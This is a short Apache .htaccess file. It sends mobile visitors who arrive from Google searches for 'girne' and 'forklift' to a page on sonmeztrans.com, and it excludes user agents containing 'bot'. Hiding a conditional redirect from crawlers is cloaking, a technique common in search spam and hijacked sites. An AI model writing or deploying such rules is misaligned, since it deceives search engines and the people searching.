RewriteEngine On
RewriteCond %{HTTP_REFERER} google\.com.*q=girne.*forklift [NC]
RewriteCond %{HTTP_USER_AGENT} "mobile|android|iphone" [NC]
RewriteCond %{HTTP_USER_AGENT} !bot [NC]
RewriteRule ^.*$ https://sonmeztrans.com/kibris-forklift-girne.html [R=302,L]
